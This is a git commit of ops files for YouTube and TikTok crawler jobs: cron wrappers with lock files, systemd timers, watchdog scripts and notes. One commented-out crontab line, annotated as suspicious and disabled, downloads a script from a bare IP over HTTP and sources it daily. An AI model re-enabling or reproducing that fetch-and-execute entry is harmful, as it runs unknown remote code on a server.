初始化提交

This commit is contained in:
dxin
2025-10-13 11:05:51 +08:00
commit ab171d45bb
301 changed files with 59788 additions and 0 deletions

View File

@@ -0,0 +1,62 @@
crontab -l
crontab -e
*/1 * * * * bash /data/webapps/prod_yt_search_crawler/cron_run_yt_search_crawler.sh
0 10 * * * /data/webapps/test_yt_data_update/scripts/run_update_yt.sh >> /data/webapps/test_yt_data_update/logs/cron_update_yt.log 2>&1
0 10 * * 1 /data/webapps/test_yt_data_update/scripts/run_update_yt_week.sh >> /data/webapps/test_yt_data_update/logs/cron_update_yt_week.log 2>&1
每10分钟执行一次: */10 * * * * bash /data/webapps/yt_data_update/monitor_update_yt_day.sh
晚上8点执行一次: 0 20 * * * bash /data/webapps/prod_nano_crawler/cron_run_nano_crawler.sh
每天的 11:15 AM: 15 11 * * *
7 14 * * * bash /data/webapps/prod_nano_crawler/cron_run_nano_crawler.sh
(注意:下面这条已被注释停用;它会每天通过明文 HTTP 从一个裸 IP 下载脚本并直接 source 执行,来源不明,请勿启用,并建议排查主机安全)
### @daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
用 tee 重新启动(日志自动写入多个文件):
nohup python async_yt.py | tee -a output.log > output_$(date +%Y%m%d).log 2>&1 &
1、这是我的定时任务
0 10 * * * /data/webapps/test_yt_data_update/scripts/run_update_yt.sh >> /data/webapps/test_yt_data_update/logs/cron_update_yt.log 2>&1
2、run_update_yt.sh 文件
#!/bin/bash
LOCKFILE="/tmp/update_yt.lock"
LOGFILE="/data/webapps/test_yt_data_update/logs/update_yt.log"
cd /data/webapps/test_yt_data_update/
if [ -e "$LOCKFILE" ]; then
echo "$(date): Task is already running, skipping." >> "$LOGFILE"
exit 1
fi
touch "$LOCKFILE"
source ~/.bashrc
conda activate py310
pip install -r requirements.txt
python update_yt.py >> "$LOGFILE" 2>&1
rm -f "$LOCKFILE"
3、经过一天发现有以下问题
3.1、通过日志 update_yt.log 发现,定时任务确实在 10 点第一次启动并成功运行脚本,但是后续每分钟都执行一次,持续了一小时;我只需要它每天 10 点启动一次。以下是日志:
- Active tasks: 11/12
- Queue sizes: video=0, channel=0
2025-04-11 10:00:06,880 - update_yt.py - INFO - Starting update tasks...
2025-04-11 10:00:09,125 - update_yt.py - INFO - aiohttp session initialized successfully
Fri Apr 11 10:01:01 CST 2025: Task is already running, skipping.
Fri Apr 11 10:02:01 CST 2025: Task is already running, skipping.
Fri Apr 11 10:03:01 CST 2025: Task is already running, skipping.
Fri Apr 11 10:04:01 CST 2025: Task is already running, skipping.
Fri Apr 11 10:05:01 CST 2025: Task is already running, skipping.
3.2、定时任务本身的日志 cron_update_yt.log 太冗杂且没有时间戳,分不清是什么时间的 cron,也没有开始、结束之类的日志提示;而且它每分钟执行一次,导致日志里有 60 次相同的内容。以下是日志:
Requirement already satisfied: PyMySQL==1.1.1 in /root/miniconda3/envs/py310/lib/python3.10/site-packages (from -r requirements.txt (line 13)) (1.1.1)
Requirement already satisfied: python-dotenv==1.0.1 in /root/miniconda3/envs/py310/lib/python3.10/site-packages (from -r requirements.txt (line 14)) (1.0.1)
Requirement already satisfied: typing_extensions==4.12.2 in /root/miniconda3/envs/py310/lib/python3.10/site-packages (from -r requirements.txt (line 15)) (4.12.2)
/data/webapps/test_yt_data_update/scripts/run_update_yt.sh: line 15: 30412 Killed python update_yt.py >> "$LOGFILE" 2>&1

View File

@@ -0,0 +1,35 @@
#!/bin/bash
# Cron wrapper for the weekly update job (update_yt_week.py).
#
# Skips the run when $LOCKFILE already exists, otherwise takes the lock,
# activates the py310 conda environment, installs requirements.txt and runs
# the Python script. Everything this wrapper prints is appended to $CRONLOG;
# the Python script's own output is appended to $LOGFILE.
#
# Exit status: 1 when the project directory cannot be entered or the lock is
# already held; otherwise the status of the final echo.

LOCKFILE="/tmp/update_yt_week.lock"
LOGFILE="/data/webapps/yt_data_update/logs/update_yt_week.log"
CRONLOG="/data/webapps/yt_data_update/logs/cron_update_yt_week.log"

{
  echo "[$(date '+%F %T')] ==== Cron 任务启动 ===="

  cd /data/webapps/yt_data_update/ || {
    echo "[$(date '+%F %T')] 未能进入目标目录"
    exit 1
  }

  # Take the lock atomically: under noclobber the redirection fails if the
  # file already exists, so there is no gap between "check" and "create".
  # The subshell keeps noclobber from leaking into the rest of the script and
  # its stderr is dropped because the failure is reported just below.
  if ! (set -o noclobber; : > "$LOCKFILE") 2>/dev/null; then
    echo "[$(date '+%F %T')] 任务已经在运行, 跳过。"
    exit 1
  fi
  # Installed only after the lock is ours, so a skipped run never removes the
  # lock that belongs to the run still in progress.
  trap 'rm -f -- "$LOCKFILE"' EXIT

  source ~/.bashrc
  conda activate py310

  echo "[$(date '+%F %T')] 安装依赖中..."
  pip install -r requirements.txt

  echo "[$(date '+%F %T')] 运行周更脚本update_yt_week.py..."
  # The weekly wrapper must run the weekly script; it previously started
  # update_yt.py, contradicting the message above and the log/lock names.
  python update_yt_week.py >> "$LOGFILE" 2>&1

  echo "[$(date '+%F %T')] 任务完成."
  rm -f -- "$LOCKFILE"
  echo "[$(date '+%F %T')] ==== Cron 任务结束 ===="
} >> "$CRONLOG" 2>&1

View File

@@ -0,0 +1,48 @@
#!/bin/bash
# Cron wrapper for the daily update job (update_yt.py).
#
# Skips the run when $LOCKFILE already exists, otherwise takes the lock,
# activates the py310 conda environment, installs requirements.txt and runs
# the Python script. Everything this wrapper prints is appended to $CRONLOG;
# the Python script's own output is appended to $LOGFILE.
#
# Exit status: 1 when the project directory cannot be entered or the lock is
# already held; otherwise the status of the final echo.

LOCKFILE="/tmp/update_yt.lock"
LOGFILE="/data/webapps/test_yt_data_update/logs/update_yt.log"
CRONLOG="/data/webapps/test_yt_data_update/logs/cron_update_yt.log"

{
  echo "[$(date '+%F %T')] ==== Cron 任务启动 ===="

  cd /data/webapps/test_yt_data_update/ || {
    echo "[$(date '+%F %T')] 未能进入目标目录"
    exit 1
  }

  # Take the lock atomically: under noclobber the redirection fails if the
  # file already exists, so two overlapping cron runs cannot both get past a
  # separate "test -e" / "touch" pair. stderr is dropped because the failure
  # is reported just below.
  if ! (set -o noclobber; : > "$LOCKFILE") 2>/dev/null; then
    echo "[$(date '+%F %T')] 任务已经在运行, 跳过。"
    exit 1
  fi
  # Installed only after the lock is ours, so a skipped run never removes the
  # lock that belongs to the run still in progress.
  trap 'rm -f -- "$LOCKFILE"' EXIT

  source ~/.bashrc
  conda activate py310

  echo "[$(date '+%F %T')] 安装依赖中..."
  pip install -r requirements.txt

  echo "[$(date '+%F %T')] 运行日更脚本update_yt.py..."
  python update_yt.py >> "$LOGFILE" 2>&1

  echo "[$(date '+%F %T')] 任务完成."
  rm -f -- "$LOCKFILE"
  echo "[$(date '+%F %T')] ==== Cron 任务结束 ===="
} >> "$CRONLOG" 2>&1

View File

@@ -0,0 +1,52 @@
#!/bin/bash
# Cron wrapper for the nano crawler (main.py).
#
# Skips the run when $LOCKFILE already exists, otherwise takes the lock,
# activates the py310 conda environment, installs requirements.txt, runs
# main.py and logs its exit code. Wrapper messages are appended to $CRONLOG;
# main.py's output goes to $LOGFILE.
#
# Exit status: 1 when the project directory cannot be entered or the lock is
# already held; otherwise the status of the final echo.

# ---------- Paths ----------
LOCKFILE="/tmp/main_py.lock"
PROJECT_DIR="/data/webapps/prod_nano_crawler"
LOGFILE="$PROJECT_DIR/logs/nano_crawler.log"
CRONLOG="$PROJECT_DIR/logs/cron_nano_crawler.log"

# ---------- Everything below is recorded in the cron log ----------
{
  echo "[$(date '+%F %T')] ==== 定时任务开始 ===="

  # ---------- Enter the project directory ----------
  cd "$PROJECT_DIR" || {
    echo "[$(date '+%F %T')] ❌ 无法进入项目目录:$PROJECT_DIR"
    exit 1
  }

  # ---------- Take the lock, or skip if a run is in progress ----------
  # noclobber makes the redirection fail when the file already exists, so the
  # existence check and the creation are a single atomic step. stderr is
  # dropped because the failure is reported just below.
  if ! (set -o noclobber; : > "$LOCKFILE") 2>/dev/null; then
    echo "[$(date '+%F %T')] ⚠️ 检测到已有任务在运行,跳过此次执行"
    exit 1
  fi
  # Installed only after the lock is ours, so a skipped run never removes the
  # lock that belongs to the run still in progress.
  trap 'rm -f -- "$LOCKFILE"' EXIT

  # ---------- Load the shell profile and activate the conda env ----------
  source ~/.bashrc
  conda activate py310

  # ---------- Install dependencies ----------
  echo "[$(date '+%F %T')] 📦 安装依赖中..."
  pip install -r requirements.txt

  # ---------- Run the Python script ----------
  echo "[$(date '+%F %T')] 🚀 开始执行 main.py ..."
  # NOTE(review): '>' starts a fresh $LOGFILE on every real run; this only
  # happens while holding the lock. Confirm that per-run truncation is wanted.
  python main.py > "$LOGFILE" 2>&1
  status=$?

  # ---------- Report the outcome ----------
  if (( status != 0 )); then
    echo "[$(date '+%F %T')] ❗ 脚本执行异常,退出码:$status"
  else
    echo "[$(date '+%F %T')] ✅ 脚本执行完成"
  fi

  # ---------- Release the lock ----------
  rm -f -- "$LOCKFILE"
  echo "[$(date '+%F %T')] ==== 定时任务结束 ===="
# Append rather than truncate: this redirection is opened before the lock
# check, so with '>' even a skipped invocation wiped the cron log that the
# still-running invocation was writing to.
} >> "$CRONLOG" 2>&1

View File

@@ -0,0 +1,52 @@
#!/bin/bash
# Cron wrapper for the YouTube search crawler (async_yt.py).
#
# Skips the run when $LOCKFILE already exists, otherwise takes the lock,
# activates the py310 conda environment, installs requirements.txt, runs
# async_yt.py and logs its exit code. Wrapper messages are appended to
# $CRONLOG; async_yt.py's output goes to $LOGFILE.
#
# The section headers below must stay comments: without the leading '#',
# bash tries to execute "==========" as a command on every one of them.
#
# Exit status: 1 when the project directory cannot be entered or the lock is
# already held; otherwise the status of the final echo.

# ---------- Paths ----------
LOCKFILE="/tmp/async_yt_py.lock"
PROJECT_DIR="/data/webapps/prod_yt_search_crawler"
LOGFILE="$PROJECT_DIR/output.log"
CRONLOG="$PROJECT_DIR/cron_output.log"

# ---------- Everything below is recorded in the cron log ----------
{
  echo "[$(date '+%F %T')] ==== 定时任务开始 ===="

  # ---------- Enter the project directory ----------
  cd "$PROJECT_DIR" || {
    echo "[$(date '+%F %T')] ❌ 无法进入项目目录:$PROJECT_DIR"
    exit 1
  }

  # ---------- Take the lock, or skip if a run is in progress ----------
  # noclobber makes the redirection fail when the file already exists, so the
  # existence check and the creation are a single atomic step. stderr is
  # dropped because the failure is reported just below.
  if ! (set -o noclobber; : > "$LOCKFILE") 2>/dev/null; then
    echo "[$(date '+%F %T')] ⚠️ 检测到已有任务在运行,跳过此次执行"
    exit 1
  fi
  # Installed only after the lock is ours, so a skipped run never removes the
  # lock that belongs to the run still in progress.
  trap 'rm -f -- "$LOCKFILE"' EXIT

  # ---------- Load the shell profile and activate the conda env ----------
  source ~/.bashrc
  conda activate py310

  # ---------- Install dependencies ----------
  echo "[$(date '+%F %T')] 📦 安装依赖中..."
  pip install -r requirements.txt

  # ---------- Run the Python script ----------
  echo "[$(date '+%F %T')] 🚀 开始执行 async_yt.py ..."
  # NOTE(review): '>' starts a fresh $LOGFILE on every real run; confirm that
  # per-run truncation is wanted.
  python async_yt.py > "$LOGFILE" 2>&1
  status=$?

  # ---------- Report the outcome ----------
  if (( status != 0 )); then
    echo "[$(date '+%F %T')] ❗ 脚本执行异常,退出码:$status"
  else
    echo "[$(date '+%F %T')] ✅ 脚本执行完成"
  fi

  # ---------- Release the lock ----------
  rm -f -- "$LOCKFILE"
  echo "[$(date '+%F %T')] ==== 定时任务结束 ===="
} >> "$CRONLOG" 2>&1

View File

@@ -0,0 +1,52 @@
#!/bin/bash
# Cron wrapper for the daily update job (update_yt.py), with exit-code
# reporting.
#
# Skips the run when $LOCKFILE already exists, otherwise takes the lock,
# activates the py310 conda environment, installs requirements.txt, runs
# update_yt.py and logs its exit code. Wrapper messages are appended to
# $CRONLOG; update_yt.py's output is appended to $LOGFILE.
#
# Exit status: 1 when the project directory cannot be entered or the lock is
# already held; otherwise the status of the final echo.

# ---------- Paths ----------
LOCKFILE="/tmp/update_yt.lock"
PROJECT_DIR="/data/webapps/test_yt_data_update"
LOGFILE="$PROJECT_DIR/logs/update_yt.log"
CRONLOG="$PROJECT_DIR/logs/cron_update_yt.log"

# ---------- Everything below is recorded in the cron log ----------
{
  echo "[$(date '+%F %T')] ==== 定时任务开始 ===="

  # ---------- Enter the project directory ----------
  cd "$PROJECT_DIR" || {
    echo "[$(date '+%F %T')] ❌ 无法进入项目目录:$PROJECT_DIR"
    exit 1
  }

  # ---------- Take the lock, or skip if a run is in progress ----------
  # noclobber makes the redirection fail when the file already exists, so the
  # existence check and the creation are a single atomic step. stderr is
  # dropped because the failure is reported just below.
  if ! (set -o noclobber; : > "$LOCKFILE") 2>/dev/null; then
    echo "[$(date '+%F %T')] ⚠️ 检测到已有任务在运行,跳过此次执行"
    exit 1
  fi
  # Installed only after the lock is ours, so a skipped run never removes the
  # lock that belongs to the run still in progress.
  trap 'rm -f -- "$LOCKFILE"' EXIT

  # ---------- Load the shell profile and activate the conda env ----------
  source ~/.bashrc
  conda activate py310

  # ---------- Install dependencies ----------
  echo "[$(date '+%F %T')] 📦 安装依赖中..."
  pip install -r requirements.txt

  # ---------- Run the Python script ----------
  echo "[$(date '+%F %T')] 🚀 开始执行 update_yt.py ..."
  python update_yt.py >> "$LOGFILE" 2>&1
  status=$?

  # ---------- Report the outcome ----------
  if (( status != 0 )); then
    echo "[$(date '+%F %T')] ❗ 脚本执行异常,退出码:$status"
  else
    echo "[$(date '+%F %T')] ✅ 脚本执行完成"
  fi

  # ---------- Release the lock ----------
  rm -f -- "$LOCKFILE"
  echo "[$(date '+%F %T')] ==== 定时任务结束 ===="
} >> "$CRONLOG" 2>&1

View File

@@ -0,0 +1,19 @@
# Oneshot service that runs update_yt.py inside the py310 conda environment.
[Unit]
Description=Daily update_yt.py script
After=network.target

[Service]
Type=oneshot
WorkingDirectory=/data/webapps/test_yt_data_update
# The shell command is kept on one line: a unit-file value ends at the first
# newline that is not preceded by a backslash, so a quoted string spread over
# several plain lines is not read as a single ExecStart= command.
# flock -n gives up immediately instead of waiting when the lock is held.
ExecStart=/bin/bash -c '. ~/.bashrc && conda activate py310 && /usr/bin/flock -n /tmp/update_yt.lock python update_yt.py >> logs/update_yt.log 2>&1'
# Anything the shell itself prints (outside the redirection above) lands here.
StandardOutput=append:/data/webapps/test_yt_data_update/logs/systemd_update_yt.log
StandardError=append:/data/webapps/test_yt_data_update/logs/systemd_update_yt.log

[Install]
WantedBy=multi-user.target

View File

@@ -0,0 +1,11 @@
# Timer that activates yt_update.service.
[Unit]
Description=Run update_yt.py daily script at 10:00
[Timer]
# Calendar trigger: every day at 10:00:00.
OnCalendar=*-*-* 10:00:00
# NOTE(review): this is a second trigger in addition to OnCalendar=; it looks
# like the service may be started again 2h after it last became inactive,
# i.e. more often than the "daily" in Description suggests. Confirm intended.
OnUnitInactiveSec=2h
# NOTE(review): presumably meant to catch up a 10:00 run missed while the
# machine was off. Verify against the systemd.timer documentation.
Persistent=true
Unit=yt_update.service
[Install]
WantedBy=timers.target

View File

@@ -0,0 +1,15 @@
# Oneshot service that runs update_yt_week.py inside the py310 conda
# environment.
[Unit]
Description=Weekly update_yt_week.py script
After=network.target

[Service]
Type=oneshot
WorkingDirectory=/data/webapps/test_yt_data_update
# The shell command is kept on one line: a unit-file value ends at the first
# newline that is not preceded by a backslash, so a quoted string spread over
# several plain lines is not read as a single ExecStart= command.
# flock -n gives up immediately instead of waiting when the lock is held.
ExecStart=/bin/bash -c '. ~/.bashrc && conda activate py310 && /usr/bin/flock -n /tmp/update_yt_week.lock python update_yt_week.py >> logs/update_yt_week.log 2>&1'
# Anything the shell itself prints (outside the redirection above) lands here.
StandardOutput=append:/data/webapps/test_yt_data_update/logs/systemd_update_yt_week.log
StandardError=append:/data/webapps/test_yt_data_update/logs/systemd_update_yt_week.log

View File

@@ -0,0 +1,11 @@
# Timer that activates yt_update_week.service.
[Unit]
Description=Run update_yt_week.py weekly script at 10:00 every Monday
[Timer]
# Calendar trigger: Mondays at 10:00:00.
OnCalendar=Mon *-*-* 10:00:00
# NOTE(review): this is a second trigger in addition to OnCalendar=; it looks
# like the service may be started again 2h after it last became inactive,
# i.e. more often than the "weekly" in Description suggests. Confirm intended.
OnUnitInactiveSec=2h
# NOTE(review): presumably meant to catch up a Monday run missed while the
# machine was off. Verify against the systemd.timer documentation.
Persistent=true
Unit=yt_update_week.service
[Install]
WantedBy=timers.target

View File

@@ -0,0 +1,70 @@
# 查看 timer 状态
systemctl list-timers | grep yt_update
# 查看 timer 的详细计划
systemctl status yt_update.timer
# 查看是否成功调用了对应的 service
journalctl -u yt_update.service
# 查看所有激活的定时器
systemctl list-timers
# 查看特定 timer 状态
systemctl status yt_update.timer
# 手动触发任务
systemctl start yt_update.service
# 查看任务日志(systemd 层)
tail -f logs/systemd_update_yt.log
# 查看脚本输出日志
tail -f logs/update_yt.log
# 禁用任务
systemctl disable --now yt_update.timer
#--------------------------------------------------------------------------
# 文件部署 & 启动命令
# 将 4 个文件放到 /etc/systemd/system/
sudo cp yt_update* /etc/systemd/system/
sudo cp yt_update_week* /etc/systemd/system/
# 刷新 systemd 配置
sudo systemctl daemon-reload
# 启动并开机自启 timer
sudo systemctl enable --now yt_update.timer
sudo systemctl enable --now yt_update_week.timer
#--------------------------------------------------------------------------
#使 systemd 服务和定时器生效
#重新加载 systemd 配置,以使新的服务和定时器生效:
sudo systemctl daemon-reload
#启动并启用定时器:
sudo systemctl enable yt_update.timer
sudo systemctl start yt_update.timer
sudo systemctl enable yt_update_week.timer
sudo systemctl start yt_update_week.timer
# 检查定时任务状态
#查看 yt_update.timer 和 yt_update_week.timer 的状态,确保它们正常运行:
sudo systemctl status yt_update.timer
sudo systemctl status yt_update_week.timer
# 查看日志
update_yt.py 脚本的日志会保存在 /data/webapps/test_yt_data_update/logs/update_yt.log。
update_yt_week.py 脚本的日志会保存在
/data/webapps/test_yt_data_update/logs/update_yt_week.log
定时任务本身的日志(包括 yt_update.service 和 yt_update_week.service 启动信息)会分别记录在
/data/webapps/test_yt_data_update/logs/systemd_update_yt.log 和 /data/webapps/test_yt_data_update/logs/systemd_update_yt_week.log 中。
#你可以通过 journalctl 查看 systemd 服务的日志,也可以使用 cat 或其他命令来查看具体的脚本日志。
journalctl -u yt_update.service
journalctl -u yt_update_week.service

View File

@@ -0,0 +1,83 @@
#!/bin/bash
# /data/sh/start_tk_regio.sh
#
# Starts tk_region.py in the background once no earlier instance is running.
# Install with `crontab -e`:
#   0 9 * * * /data/sh/start_tk_regio.sh
#
# The shebang has to be the very first line of the file; placed below the
# header comments it is just another comment and does not select bash.
#
# Flow: enter $APP_DIR, poll up to $MAX_ATTEMPTS times ($WAIT_TIME seconds
# apart) until no process matching $PYTHON_SCRIPT is left, activate the conda
# environment and the project venv, install requirements.txt, then launch the
# script with nohup. Progress is appended to $LOG_FILE. Exits 1 as soon as any
# step fails or an old process is still alive after the last attempt.

# Settings
APP_DIR="/data/webapps/test_tk_region"
LOG_FILE="$APP_DIR/sh.log"
PYTHON_SCRIPT="tk_region.py"
MAX_ATTEMPTS=10
WAIT_TIME=600 # seconds (10 minutes)

# Append one timestamped line to $LOG_FILE.
# Arguments: $1 - message text
log() {
  echo "[$(date +'%Y-%m-%d %H:%M:%S')] $1" >> "$LOG_FILE"
}

# Enter the application directory
log "==========="
log "切换到应用目录: $APP_DIR"
cd "$APP_DIR" || {
  log "无法切换到应用目录 ${APP_DIR}脚本退出"
  exit 1
}

# Wait for any previous instance to finish
attempt=1
while (( attempt <= MAX_ATTEMPTS )); do
  log "第 $attempt 次检查是否有旧进程在运行..."
  # pgrep -f matches against the full command line and never reports itself,
  # so no "grep -v grep" filtering is needed; -d ' ' keeps several PIDs on
  # one log line.
  pid=$(pgrep -d ' ' -f "$PYTHON_SCRIPT")
  if [[ -z "$pid" ]]; then
    log "未发现运行中的 $PYTHON_SCRIPT 进程,准备启动新进程"
    break
  fi

  log "发现运行中的进程PID: $pid"
  if (( attempt == MAX_ATTEMPTS )); then
    log "已达到最大等待次数 ($MAX_ATTEMPTS),仍有进程在运行,放弃启动"
    exit 1
  fi
  log "等待 $((WAIT_TIME/60)) 分钟后再次检查..."
  sleep "$WAIT_TIME"
  attempt=$((attempt + 1))
done

# Load the shell profile (expected to make `conda` available)
log "激活conda路径"
source ~/.bashrc || {
  log "激活conda激活路径失败"
  exit 1
}

# Activate the conda environment
log "激活conda环境 py310"
conda activate py310 || {
  log "激活conda环境失败"
  exit 1
}

# Activate the project's virtualenv on top of it
log "激活虚拟环境"
source venv/bin/activate || {
  log "激活虚拟环境失败"
  exit 1
}

# Install dependencies
log "安装依赖包"
pip install -r requirements.txt || {
  log "安装依赖包失败"
  exit 1
}

# Launch the Python script in the background
log "启动 $PYTHON_SCRIPT 脚本"
nohup python "$PYTHON_SCRIPT" > output.log 2>&1 &
pid=$!
log "$PYTHON_SCRIPT 已启动PID: $pid"
log "脚本执行完成"

View File

@@ -0,0 +1,73 @@
#!/bin/bash
# Watchdog for update_yt.py.
#
# If a process matching "python update_yt.py" is already running, logs its PID
# and exits 0. Otherwise runs $START_SCRIPT up to $MAX_RETRY times, waiting
# $SLEEP_BETWEEN_CHECK seconds after each attempt, and exits 0 as soon as the
# process is seen, or 1 when every attempt failed. Each invocation bumps a
# per-day counter that is included in every log line.

# Configuration
PROJECT_DIR="/data/webapps/yt_data_update"
SCRIPT_NAME="update_yt.py"
START_SCRIPT="$PROJECT_DIR/run_update_yt_day.sh"
LOG_DIR="$PROJECT_DIR/logs"
TODAY=$(date +%F)
LOG_FILE="$LOG_DIR/monitor/monitor_day_$TODAY.log"
MAX_RETRY=3
SLEEP_BETWEEN_CHECK=10

# The log file and the counter both live in $LOG_DIR/monitor, so that is the
# directory that has to exist (mkdir -p creates $LOG_DIR along the way).
mkdir -p "$LOG_DIR/monitor"

# Per-day invocation counter
COUNT_FILE="$LOG_DIR/monitor/monitor_day_count_$TODAY.txt"
[[ -f "$COUNT_FILE" ]] || echo 0 > "$COUNT_FILE"
COUNT=$(<"$COUNT_FILE")
COUNT=$((COUNT + 1))
echo "$COUNT" > "$COUNT_FILE"

# Append one timestamped line, tagged with the invocation count, to $LOG_FILE.
# Arguments: $1 - message text
log() {
  echo "$(date '+%F %T') [第 $COUNT 次执行检查] $1" >> "$LOG_FILE"
}

# Returns 0 when a process whose command line matches "python $SCRIPT_NAME"
# exists, non-zero otherwise (pgrep's own exit status).
is_running() {
  pgrep -f "python $SCRIPT_NAME" > /dev/null 2>&1
}

# Runs $START_SCRIPT, then re-checks after one second. On success records the
# first matching PID in $PROJECT_DIR/update_yt_day.pid.
# Returns: 0 when the process is running afterwards, 1 otherwise.
start_script() {
  local pid
  log "尝试启动脚本..."
  bash "$START_SCRIPT"
  sleep 1

  if is_running; then
    pid=$(pgrep -f "python $SCRIPT_NAME" | head -n 1)
    echo "$pid" > "$PROJECT_DIR/update_yt_day.pid"
    log "启动成功PID=$pid"
    return 0
  fi
  log "启动失败"
  return 1
}

# Main flow
if is_running; then
  PID=$(pgrep -f "python $SCRIPT_NAME" | head -n 1)
  log "脚本已在运行中PID=$PID"
  exit 0
fi

log "检测到脚本未运行,开始重启流程..."
RETRY=0
while (( RETRY < MAX_RETRY )); do
  # The return value is intentionally not used here: the decision is made by
  # the is_running check after the longer wait below.
  start_script
  sleep "$SLEEP_BETWEEN_CHECK"
  if is_running; then
    log "$((RETRY+1)) 次尝试启动成功。"
    exit 0
  else
    log "$((RETRY+1)) 次尝试启动失败。"
  fi
  RETRY=$((RETRY + 1))
done

log "连续 $MAX_RETRY 次重启失败,放弃本轮重试。"
exit 1

View File

@@ -0,0 +1,73 @@
#!/bin/bash
# Watchdog for update_yt_week.py.
#
# If a process matching "python update_yt_week.py" is already running, logs
# its PID and exits 0. Otherwise runs $START_SCRIPT up to $MAX_RETRY times,
# waiting $SLEEP_BETWEEN_CHECK seconds after each attempt, and exits 0 as soon
# as the process is seen, or 1 when every attempt failed. Each invocation
# bumps a per-day counter that is included in every log line.

# Configuration
PROJECT_DIR="/data/webapps/yt_data_update"
SCRIPT_NAME="update_yt_week.py"
START_SCRIPT="$PROJECT_DIR/run_update_yt_week.sh"
LOG_DIR="$PROJECT_DIR/logs"
TODAY=$(date +%F)
LOG_FILE="$LOG_DIR/monitor/monitor_$TODAY.log"
MAX_RETRY=3
SLEEP_BETWEEN_CHECK=10

# The log file and the counter both live in $LOG_DIR/monitor, so that is the
# directory that has to exist (mkdir -p creates $LOG_DIR along the way).
mkdir -p "$LOG_DIR/monitor"

# Per-day invocation counter
COUNT_FILE="$LOG_DIR/monitor/monitor_count_$TODAY.txt"
[[ -f "$COUNT_FILE" ]] || echo 0 > "$COUNT_FILE"
COUNT=$(<"$COUNT_FILE")
COUNT=$((COUNT + 1))
echo "$COUNT" > "$COUNT_FILE"

# Append one timestamped line, tagged with the invocation count, to $LOG_FILE.
# Arguments: $1 - message text
log() {
  echo "$(date '+%F %T') [第 $COUNT 次执行检查] $1" >> "$LOG_FILE"
}

# Returns 0 when a process whose command line matches "python $SCRIPT_NAME"
# exists, non-zero otherwise (pgrep's own exit status).
is_running() {
  pgrep -f "python $SCRIPT_NAME" > /dev/null 2>&1
}

# Runs $START_SCRIPT, then re-checks after one second. On success records the
# first matching PID in $PROJECT_DIR/update_yt_week.pid.
# Returns: 0 when the process is running afterwards, 1 otherwise.
start_script() {
  local pid
  log "尝试启动脚本..."
  bash "$START_SCRIPT"
  sleep 1

  if is_running; then
    pid=$(pgrep -f "python $SCRIPT_NAME" | head -n 1)
    echo "$pid" > "$PROJECT_DIR/update_yt_week.pid"
    log "启动成功PID=$pid"
    return 0
  fi
  log "启动失败"
  return 1
}

# Main flow
if is_running; then
  PID=$(pgrep -f "python $SCRIPT_NAME" | head -n 1)
  log "脚本已在运行中PID=$PID"
  exit 0
fi

log "检测到脚本未运行,开始重启流程..."
RETRY=0
while (( RETRY < MAX_RETRY )); do
  # The return value is intentionally not used here: the decision is made by
  # the is_running check after the longer wait below.
  start_script
  sleep "$SLEEP_BETWEEN_CHECK"
  if is_running; then
    log "$((RETRY+1)) 次尝试启动成功。"
    exit 0
  else
    log "$((RETRY+1)) 次尝试启动失败。"
  fi
  RETRY=$((RETRY + 1))
done

log "连续 $MAX_RETRY 次重启失败,放弃本轮重试。"
exit 1

View File

@@ -0,0 +1,8 @@
#!/bin/bash
# Launches update_yt.py in the background inside the py310 conda environment,
# appending its output to a per-day file under logs/yt_up_date_day_outup/.
# Exits 1 without starting anything if the project directory is unavailable.
source ~/.bashrc
conda activate py310
# Stop here on failure so pip and python never run from the caller's
# working directory.
cd /data/webapps/yt_data_update/ || exit 1
# The '>>' redirection below fails, and python is never started, when the
# output directory does not exist yet.
mkdir -p logs/yt_up_date_day_outup
pip install -r requirements.txt
python update_yt.py >> "logs/yt_up_date_day_outup/output_day_$(date +%F).log" 2>&1 &

View File

@@ -0,0 +1,8 @@
#!/bin/bash
# Launches update_yt_week.py in the background inside the py310 conda
# environment, appending its output to a per-day file under
# logs/yt_up_date_week_outup/.
# Exits 1 without starting anything if the project directory is unavailable.
source ~/.bashrc
conda activate py310
# Stop here on failure so pip and python never run from the caller's
# working directory.
cd /data/webapps/yt_data_update/ || exit 1
# The '>>' redirection below fails, and python is never started, when the
# output directory does not exist yet.
mkdir -p logs/yt_up_date_week_outup
pip install -r requirements.txt
python update_yt_week.py >> "logs/yt_up_date_week_outup/output_week_$(date +%F).log" 2>&1 &

View File

@@ -0,0 +1,43 @@
nohup /data/webapps/test_check_tiktok_account/venv/bin/python check_account.py > output.log 2>&1
nohup /data/webapps/test_yt_search_crawler/venv/bin/python async_yt.py > output.log 2>&1
nohup python async_yt.py > output.log 2>&1 &
nohup env PYTHONPATH=/data/webapps/test_influencer_search_agent python -m dialogue.influencer_search > /data/webapps/test_influencer_search_agent/log/test_influencer_search_20250324.log 2>&1 &
ps axjf | grep dialogue.influencer_search
ps axjf | grep async_yt.py
ps aux | grep async_yt.py
ps axjf|grep check_account.py
ps axjf | grep async_tk_crawler.py
ps axjf|grep async_yt.py|grep -v grep |awk '{print "kill -9 ",$2}'|sh -
启动脚本
cd /data/webapps/yt_search_crawler
source venv/bin/activate
nohup python async_yt.py > output.log 2>&1 &
通过 exec -a 给进程“改名”
nohup bash -c "exec -a yt01 python async_yt.py" > output_01.log 2>&1 &
nohup bash -c "exec -a yt02 python async_yt.py" > output_02.log 2>&1 &